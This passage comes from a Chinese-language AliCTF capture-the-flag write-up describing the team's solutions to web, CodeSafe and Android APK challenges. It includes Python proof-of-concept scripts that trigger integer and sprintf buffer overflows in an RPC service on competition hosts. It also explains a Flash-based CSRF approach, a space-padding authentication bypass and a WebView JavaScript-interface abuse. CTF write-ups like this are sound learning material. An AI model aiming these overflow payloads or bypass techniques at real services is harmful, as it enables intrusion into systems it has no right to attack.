href="http://drops.wooyun.org/tips/750">http://drops.wooyun.org/tips/750</a></span> </p> <p class="md_block"> <span class="md_line">taobao.com@xxx,终于有反应了..</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-webb-200-01.png" alt="img" title="" ></span> </p> <hr> <h5 id="toc_19">WEBB-300</h5> <blockquote> <p class="md_block"> <span class="md_line">白帽子的秘密<br /></span> <span class="md_line"> http://web300b.alictf.com/b5688aa7c3f8387400a3449077f9bd65.php </span> </p> </blockquote> <p class="md_block"> <span class="md_line">开始感觉题目好简单 :) 抓拍到了好幸福</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-webb-300-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">于是一晚上熬夜后收到了这个</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-webb-300-02.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">瞬间凌乱了啊,开始搞题目,先是Flash,crossdomain.xml为*,试了CSRF的POC</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-webb-300-03.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">这是赛后访问502,正常可以读到flag.php,傻傻以为这样就可以拿到Key了,提交进URL...查看日志根本没请求...心碎..</span> </p> <p class="md_block"> <span class="md_line">接着是分析whitehat图片,binwalk发现还藏了个rar,猜了半天脑洞原来密码是比赛网址,内容</span> </p> <pre><code>e.g.: *.php?img=exp</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">题目是和xss一样,提交题目页面加img参数...</span> </p> <p class="md_block"> <span class="md_line">这个在分析d4.swf文件时有看到:</span> </p> <pre><code> public dynamic class MainTimeline extends MovieClip { public var img:String; public var req:URLRequest; public var loader:Loader; public function MainTimeline(){ addFrameScript(0, this.frame1); } public function completed(_arg1:Event):void{ this.addChild(this.loader); } function frame1(){ try { ExternalInterface.call("eval", "location.href='http://www.alictf.com/';"); } catch(errObject:Error) { img = loaderInfo.parameters["img"]; req = new URLRequest(img); loader = new Loader(); loader.load(req); loader.contentLoaderInfo.addEventListener(Event.COMPLETE, completed); }; } }</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">当时感觉img即使load进来也x不成,必须自己指定一个swf才行,反而想是img直接Reflect-X到Firefox...被Chrome Protect,思路还是不对.</span> </p> <p class="md_block"> <span class="md_line">最后发现居然有上传,可惜自己没扫目录的...可以上传flash图片文件,然后在img处调用flash文件执行代码读flag文件,进行CSRF.</span> </p> <hr> <h5 id="toc_20">WEBB-400</h5> <blockquote> <p class="md_block"> <span class="md_line">一串奇怪的数字?你能帮忙揭开谜底吗? <br /></span> <span class="md_line">http://web400b.alictf.com/e708f572003bfc59728030f46fb71372.php </span> </p> </blockquote> <p class="md_block"> <span class="md_line">打开是个数字:2032687698</span> </p> <p class="md_block"> <span class="md_line">我忍住没加这个QQ号找他问flag...</span> </p> <p class="md_block"> <span class="md_line">手残加到url后直接请求下载到文件,是个管理员日志,大致是配置lnmp以及各种工具环境,最后有些目录信息,比如web400a有关的nidongde...最后没时间也没去做.</span> </p> <hr> <h5 id="toc_21">WEBB-500</h5> <blockquote> <p class="md_block"> <span class="md_line">好吃的饼干........ Casper吃了一块又一块........ <br /></span> <span class="md_line">hint:一定要给我么?绕过试试?别忘了看URL哦。<br /></span> <span class="md_line">http://web500b.alictf.com/26b8f91a01158be64de4cd299cf16f53.php </span> </p> </blockquote> <p class="md_block"> <span class="md_line">又是脑洞题目...curl -i之后发现根本不需要提交cookie,</span> </p> <p class="md_block"> <span class="md_line">http://web500b.alictf.com/ee11cbb19052e40b07aac0ca060c23ee.php</span> </p> <p class="md_block"> <span class="md_line">说是可以执行命令的...可是一直没返回...读了下<br /></span> <span class="md_line">http://web500b.alictf.com/js/user.js<br /></span> <span class="md_line">想不出所以然,就忽略了...</span> </p> <hr> <h4 id="toc_22">0x05 CodeSafe</h4> <h5 id="toc_23">CodeSafe-100</h5> <blockquote> <p class="md_block"> <span class="md_line">在域名为 codesafe100.alictf.com 的32位主机的 30000 端口上开放了一个服务。<br /></span> <span class="md_line">其源代码文件为 rpc_libevent_server.cpp。<br /></span> <span class="md_line">在这个服务程序中存在1个安全漏洞。请通过阅读源代码来找到漏洞,并向该服务器发送请求尝试触发。<br /></span> <span class="md_line">如果发送的请求能够触发漏洞,在服务器的响应数据中会给出一个32位的MD5值作为flag,示例如下:<br /></span> <span class="md_line">Flag: DC80A72CBBB71C1F6CB98E3C2935B2C0<br /></span> <span class="md_line">注意:请求中的token字段为每位选手的认证哈希值(详见账号注册邮件中分配的user_token)。<br /></span> <span class="md_line">每个合法的token仅有 5 次提交请求的机会,超过之后,该token的请求会被丢弃。</span> </p> </blockquote> <p class="md_block"> <span class="md_line">根据socket_read_callback函数知SafeCode系列协议为:<br /></span> <span class="md_line">Token_len(1字节) + Token + funcid(1字节) + data_len(4字节) + data<br /></span> <span class="md_line">SafeCode100有漏洞的函数为rpc_function_1:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-codesafe-100-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">mtl为unsigned short类型,而temp.tl和tl最大表示值为511和199</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-codesafe-100-02.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">而511*199 = 101689 = 0x18D39<br /></span> <span class="md_line">超出了unsigned short能表示的最大值.所以当temp.tl和tl足够大时,会发生整数溢出.</span> </p> <p class="md_block"> <span class="md_line">POC:</span> </p> <pre><code>#coding:utf-8 from socket import * import struct import time s = socket(AF_INET, SOCK_STREAM) s.connect(('223.6.253.103', 30000)) token = 'bab1e617f537b121033058a5795e37e0' len_token = '\x20' f_id = '\x02' data = '\x48\x48\x00\x00' #data += '\xcc'*4 data += struct.pack('I', time.time()) data += '\x02\x00\x00\x00' data += 'sdatsts-afu\x00\x00\x00\x00\x00' url = 'http://alibaba.com/' url += 'a'*(256-len(url)) len_url = len(url) data += struct.pack('I', len_url) data += url len_data = len(data) send_data = len_token + token + f_id + struct.pack('&gt;I', len_data) + data print send_data s.send(send_data) print s.recv(1024)</code></pre> <!--block_code_end--> <hr> <h5 id="toc_24">CodeSafe-200</h5> <blockquote> <p class="md_block"> <span class="md_line">在域名为 codesafe200.alictf.com 的32位主机的 30000 端口上开放了一个服务。<br /></span> <span class="md_line"> 其源代码文件为 rpc_libevent_server.cpp。<br /></span> <span class="md_line"> 在这个服务程序中存在1个安全漏洞。请通过阅读源代码来找到漏洞,并向该服务器发送请求尝试触发。<br /></span> <span class="md_line"> 如果发送的请求能够触发漏洞,在服务器的响应数据中会给出一个32位的MD5值作为flag,示例如下:<br /></span> <span class="md_line"> Flag: DC80A72CBBB71C1F6CB98E3C2935B2C0<br /></span> <span class="md_line"> 注意:请求中的token字段为每位选手的认证哈希值(详见账号注册邮件中分配的user_token)。<br /></span> <span class="md_line"> 每个合法的token仅有 4 次提交请求的机会,超过之后,该token的请求会被丢弃。<br /></span> <span class="md_line"> 题目下载地址:点击下载</span> </p> </blockquote> <p class="md_block"> <span class="md_line">漏洞所在函数为rpc_function_2</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-codesafe-200-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">buffer空间为512字节,传入的data数据最大长度为511字节</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-codesafe-200-02.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">函数要求的输入格式为tag = value但是函数最后用sprintf把line(data)和tag和value都打印到只有512字节的buffer中,如果符合输入格式要求且剩余字节用空格填充会照成溢出.</span> </p> <p class="md_block"> <span class="md_line">POC:</span> </p> <pre><code>#coding:utf-8 from socket import * import struct s = socket(AF_INET, SOCK_STREAM) s.connect(('42.120.63.194', 30000)) token = 'bab1e617f537b121033058a5795e37e0' len_token = '\x20' f_id = '\x02' data = ' ' + 'a'*60 + '=' + '1834567890123456' data += ' '* (510 - len(data)) len_data = len(data) send_data = len_token + token + f_id + struct.pack('&gt;I', len_data) + data print send_data s.send(send_data) print s.recv(1024)</code></pre> <!--block_code_end--> <hr> <h5 id="toc_25">CodeSafe-300</h5> <blockquote> <p class="md_block"> <span class="md_line">在域名为 codesafe300.alictf.com 的32位主机的 30000 端口上开放了一个服务。<br /></span> <span class="md_line">其源代码文件为 rpc_libevent_server.cpp。<br /></span> <span class="md_line">在这个服务程序中存在1个 缓冲区溢出 漏洞。请通过阅读源代码来找到漏洞,并向该服务器发送请求尝试触发。<br /></span> <span class="md_line">如果发送的请求能够触发漏洞,在服务器的响应数据中会给出一个32位的MD5值作为flag,示例如下:<br /></span> <span class="md_line">Flag: DC80A72CBBB71C1F6CB98E3C2935B2C0<br /></span> <span class="md_line">注意:请求中的token字段为每位选手的认证哈希值(详见账号注册邮件中分配的user_token)。<br /></span> <span class="md_line">每个合法的token仅有 3 次提交请求的机会,超过之后,该token的请求会被丢弃。</span> </p> </blockquote> <p class="md_block"> <span class="md_line">漏洞出现在函数rpc_fuction_2中</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-codesafe-300-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">p为请求URL的绝对路径</span> </p> <p class="md_block"> <span class="md_line">r分配被了256字节空间</span> </p> <p class="md_block"> <span class="md_line">URL的大小也为256</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-codesafe-300-02.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">一个符合函数要求格式的URL如:</span> </p> <p class="md_block"> <span class="md_line">http:// alibaba.com/xxxx</span> </p> <p class="md_block"> <span class="md_line">其中&quot;http:// alibaba.com/&quot;为20个字节,而/temporary folder/2014-08/有26个字节.所以如果提供一个256字节的URL,绝对路径有236字节,被sprintf打印后有262字节,就照成了溢出.</span> </p> <p class="md_block"> <span class="md_line">POC:</span> </p> <pre><code>#coding:utf-8 from socket import * import struct import time s = socket(AF_INET, SOCK_STREAM) s.connect(('223.6.253.103', 30000)) #token = 'bab1e617f537b121033058a5795e37e0' token = 'afc0f1402e0439fb57e87b45ab456b37' len_token = '\x20' f_id = '\x02' data = '\x48\x48\x00\x00' #data += '\xcc'*4 data += struct.pack('I', time.time()) data += '\x02\x00\x00\x00' data += 'sdatsts-afu\x00\x00\x00\x00\x00' url = 'http://alibaba.com/' url += 'a'*(256-len(url)) len_url = len(url) data += struct.pack('I', len_url) data += url len_data = len(data) send_data = len_token + token + f_id + struct.pack('&gt;I', len_data) + data print send_data s.send(send_data) print s.recv(1024)</code></pre> <!--block_code_end--> <hr> <h5 id="toc_26">CodeSafe-400</h5> <blockquote> <p class="md_block"> <span class="md_line">在域名为 codesafe400.alictf.com 的32位主机的 30000 端口上开放了一个服务。<br /></span> <span class="md_line"> 其源代码文件为 rpc_libevent_server.cpp。<br /></span> <span class="md_line"> 在这个服务程序中存在1个安全漏洞。请通过阅读源代码来找到漏洞,并向该服务器发送请求尝试触发。<br /></span> <span class="md_line"> 如果发送的请求能够触发漏洞,在服务器的响应数据中会给出一个32位的MD5值作为flag,示例如下:<br /></span> <span class="md_line"> Flag: DC80A72CBBB71C1F6CB98E3C2935B2C0<br /></span> <span class="md_line"> 注意:请求中的token字段为每位选手的认证哈希值(详见账号注册邮件中分配的user_token)。<br /></span> <span class="md_line"> 每个合法的token仅有 2 次提交请求的机会,超过之后,该token的请求会被丢弃。</span> </p> </blockquote> <p class="md_block"> <span class="md_line">这个不得不吐槽下,缩进简直太美</span> </p> <p class="md_block"> <span class="md_line">只要程序执行到system函数就会返回key</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-codesafe-400-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">但是这个地方坑了我好长时间...一直以没看出来=0=</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-codesafe-400-02.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">看出来之后就好做了</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-codesafe-400-03.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">Guest密码判断后又调用了一次function1函数,用来除掉空格.而szUser又temp.user的前63个字节复制来.</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-codesafe-400-04.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">所以只需要admin+64*&#39;\x20&#39;+a这样的字符串即可饶过</span> </p> <p class="md_block"> <span class="md_line">POC:</span> </p> <pre><code>#include&lt;stdio.h&gt; #include&lt;string.h&gt; #include&lt;ctype.h&gt; #include&lt;malloc.h&gt; #include&lt;time.h&gt; void function3(char m[],char k[],char r[]) { int i,j,s=0; j=strlen(k); for(i=0;m[i];i++) m[i]=tolower(m[i]); for(i=0;m[i];i++) if(isalpha(m[i])) { r[i]=(m[i]-'a'+k[s%j]-'a')%26+'a'; s++; } else r[i]=m[i]; r[i]=0; for(i=0;r[i];i++) r[i]=toupper(r[i]); } int main() { char pass[64] = {0}, value[64]; memcpy(pass, "aiwtnbx", 7); function3(pass, "admin", value); printf("%s", value); if(strcmp(value,"ALIBABA") == 0) printf("%s", "True"); else printf("%s", "false"); return 0; }</code></pre> <!--block_code_end--> <hr> <h4 id="toc_27">0x06 EvalAPK</h4> <h5 id="toc_28">EvilAPK-100</h5> <blockquote> <p class="md_block"> <span class="md_line">APK在执行过程中使用了一个文件作为输入,请问该文件的名称是什么?(不需要路径)<br /></span> <span class="md_line">题目下载地址:点击下载</span> </p> </blockquote> <p class="md_block"> <span class="md_line">FirstBlood.三人不熟悉APK,也没有相应的分析环境,本要做Web100,看了半天(比赛前期地址泄漏了)没解决掉,看到APK100提交的很欢乐,就做了,没想到String一下出来了.</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-apk-100-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">提交inputfile解决</span> </p> <hr> <h5 id="toc_29">EvilAPK-200</h5> <blockquote> <p class="md_block"> <span class="md_line">请分析static_analysis.apk安装包。<br /></span> <span class="md_line">分析出在静态代码中有多少个地方调用了sendSMS方法(不包括该方法本身且flag为数字)<br /></span> <span class="md_line">题目下载地址:点击下载</span> </p> </blockquote> <p class="md_block"> <span class="md_line">用apktool d xx.apk反编译后,来find命令</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-apk-200-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">如上图是在Kali下History...</span> </p> <hr> <h5 id="toc_30">EvilAPK-300</h5> <blockquote> <p class="md_block"> <span class="md_line">该破解程序jscrack主界面包含两个控件:<br /></span> <span class="md_line"> 1)URL输入框<br /></span> <span class="md_line"> 2)进入”按钮“<br /></span> <span class="md_line"> 要求自己构造一个网页,并把网页对应的URL输入到URL输入框控件,然后,点击”进入”按钮,jscrack会打开webview浏览你的网页,如果jscrack能弹出一个Toast,就证明已经成功破解,同时Toast显示的内容就是这个题目的flag。<br /></span> <span class="md_line"> 题目下载地址:点击下载</span> </p> </blockquote> <p class="md_block"> <span class="md_line">看题意与WEBView漏洞有关,就去搜索相关资料</span> </p> <p class="md_block"> <span class="md_line">得到一个测试接口的POC</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><a class="md_compiled" href="http://drops.wooyun.org/webview.html">http://drops.wooyun.org/webview.html</a></span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-apk-300-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">有了存在问题的接口SmokeyBear,就继续科普什么是Toast,怎么输出toast以及接口怎么利用,模仿wooyun的检测页面,最后试了用接口.showToast()真的出来了...参考如下文章:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-apk-300-02.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">放到server上测试如下页面</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-apk-300-03.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">用jscrack访问,得到flag</span> </p> <p class="md_block"> <span class="md_line">其他APK题目队伍没人熟悉.不得不放弃...感谢APK出题者前面三关都不难...</span> </p> <h4 id="toc_31">0x07 AfterAll</h4> <p class="md_block"> <span class="md_line">Thx AliCTF.</span> </p> <p class="md_block"> <span class="md_line">::L Team::</span> </p>